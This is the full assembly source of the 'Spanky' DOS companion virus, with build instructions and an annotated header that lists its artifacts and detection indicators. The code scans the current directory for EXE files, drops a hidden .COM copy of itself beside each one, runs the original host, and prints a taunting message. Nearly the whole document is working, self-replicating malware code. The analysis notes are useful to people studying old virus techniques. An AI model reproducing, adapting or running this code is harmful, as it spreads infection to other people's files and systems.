;Spanky Virus
;
; A sample companion virus that will search its current directory for
; EXE files and then copy itself to a hidden COM file with the same
; name. Before execution of the virus it executes its Host program.
;
; To compile:
;   TASM spanky.asm
;   TLINK /t spanky.obj
;
; (c) Sept 1998 Academic Underground
;
; Target: 16-bit DOS, tiny model (.COM image loaded at offset 100h).
; All services are requested through INT 21h.
;
; Analysis notes (behaviour visible in this listing):
;   * Artifact: for each *.EXE matched in the current directory, a file
;     with the same base name and a .COM extension is created with the
;     hidden attribute (CX = 2) and filled with END_V - SPANKY bytes of
;     this image. The host .EXE itself is never opened or modified.
;   * Each copy carries the matched host name in REAL_NAME, plus the
;     constant strings '*.EXE' and MSG; these are stable scan strings.
;   * The companion technique relies on DOS resolving NAME to NAME.COM
;     before NAME.EXE when no extension is typed. A hidden .COM sitting
;     beside an .EXE of the same base name is the indicator to look for;
;     starting programs with an explicit .EXE extension bypasses it.
;   * AH=3Ch is create-or-truncate, so a NAME.COM that already existed
;     is replaced by the copy.
;   * In a freshly assembled image REAL_NAME is uninitialised, so the
;     EXEC call has no valid host name there and presumably fails; the
;     code does not test the carry flag after EXEC either way.

.model tiny
.code

FNAME EQU 9Eh                           ; DTA at 80h + 1Eh: found file name (ASCIIZ)

org 100h

SPANKY:
        ; Move the stack just above the image, then shrink the memory
        ; block so that DOS has free memory to load the host into.
        mov     sp, offset END_V + 100h
        mov     ah, 4Ah                 ; INT 21h: resize memory block
        mov     bx, sp
        mov     cl,4
        shr     bx,cl                   ; bytes -> 16-byte paragraphs
        inc     bx                      ; round up; BX = paragraphs to keep
        int     21h

        ; Fill in the EXEC parameter block. Offsets 80h/5Ch/6Ch are
        ; assembled into PARAM_BLK; only the segment halves are set here.
        mov     bx, 2Ch                 ; PSP:2Ch holds the environment segment
        mov     ax, [bx]
        mov     WORD PTR [PARAM_BLK], ax ; environment segment for the child
        mov     ax,cs
        mov     word ptr [PARAM_BLK+4], ax  ; segment of command tail (PSP:80h)
        mov     word ptr [PARAM_BLK+8], ax  ; segment of first FCB   (PSP:5Ch)
        mov     word ptr [PARAM_BLK+12], ax ; segment of second FCB  (PSP:6Ch)
        mov     ax, 4B00h               ; INT 21h: load and execute program
        mov     bx,offset PARAM_BLK     ; ES:BX -> parameter block
        mov     dx,offset REAL_NAME     ; DS:DX -> host file name stored in this copy
        int     21h                     ; run the host with the caller's command tail

        ; Reload stack and segment registers from CS after EXEC returns
        ; (presumably because EXEC is not trusted to preserve them).
        cli                             ; no interrupts while SS:SP is inconsistent
        mov     bx, ax                  ; keep AX as returned by EXEC
        mov     ax,cs
        mov     ss,ax
        mov     sp,(END_V - SPANKY) + 200h ; same value as the SP set at entry
        sti
        push    bx
        mov     ds,ax
        mov     es,ax

        mov     ah,1Ah                  ; INT 21h: set disk transfer area
        mov     dx,80h                  ; DTA = PSP:80h, so the name lands at FNAME
        int     21h
        pop     ax                      ; saved EXEC result; overwritten by the next mov

        mov     ax, 4e00h               ; INT 21h: find first matching file
        mov     dx, offset EXE_FILE     ; pattern '*.EXE', no path: current directory
        mov     cx, 0                   ; attribute mask 0: normal files only
        int     21h

SEARCH_AGAIN:
        jc      DONE                    ; CF set: no (more) matches
        call    INFECT                  ; drop a companion for this match
        mov     ah,4fh                  ; INT 21h: find next (uses the same DTA)
        int     21h
        jmp     SEARCH_AGAIN

; INFECT: create the hidden .COM companion for the file named in the DTA.
;   In:    DS = ES = CS, DTA at 80h holding a find-first/next result
;   Out:   none; errors from create are skipped, write/close are unchecked
;   Clobb: AX, BX, CX, DX, SI, DI, flags
INFECT:
        mov     si, FNAME               ; source: matched name in the DTA
        mov     di, offset REAL_NAME    ; destination: host name embedded in the copy
COPY_LOOP:
        lodsb
        stosb
        or      al,al                   ; stop after the terminating NUL is copied
        jnz     COPY_LOOP

        ; SI is now one past the NUL, so [si-4..si-1] is "EXE",0 in the
        ; DTA. Only the DTA name is patched; REAL_NAME keeps ".EXE".
        mov     ah,3CH                  ; INT 21h: create or truncate file
        mov     word ptr [si-4],'OC'; stored low byte first: 'C','O'
        mov     word ptr [si-2],'M'     ; 'M' followed by the NUL terminator
        mov     dx, FNAME               ; DS:DX -> NAME.COM
        mov     cx, 2                   ; attribute 2 = hidden
        int     21h
        jc      INF_EXIT                ; create failed: skip this file
        mov     bx,ax                   ; BX = file handle
        mov     ah,40h                  ; INT 21h: write to handle
        mov     cx,END_V - SPANKY       ; byte count = whole image incl. data
        mov     dx,offset SPANKY        ; DS:DX -> start of image
        int     21h                     ; result is not checked
        mov     ah,3Eh                  ; INT 21h: close handle
        int     21h
INF_EXIT:
        ret

; PAYLOAD: print MSG to standard output. Clobbers AX, DX.
PAYLOAD:
        mov     ah,9h                   ; INT 21h: print '$'-terminated string
        mov     dx,offset MSG
        int     21h
        ret

DONE:
        call    PAYLOAD                 ; runs once, after the directory scan ends
        mov     ax,4c00h                ; INT 21h: terminate, exit code 0
        int     21h

EXE_FILE db '*.EXE',0                   ; search pattern (ASCIIZ)
MSG db 13,10,'Microsoft does not REALLY love you!',13,10,' -- Spanky$'
REAL_NAME db 13 dup (?)                 ; host name, 8.3 + NUL; written into each copy
PARAM_BLK dw ?                          ; +0  environment segment
        dd 80H                          ; +2  far pointer to command tail
        dd 5Ch                          ; +6  far pointer to first FCB
        dd 6Ch                          ; +10 far pointer to second FCB
END_V:                                  ; end of image; used for size and stack placement
END SPANKY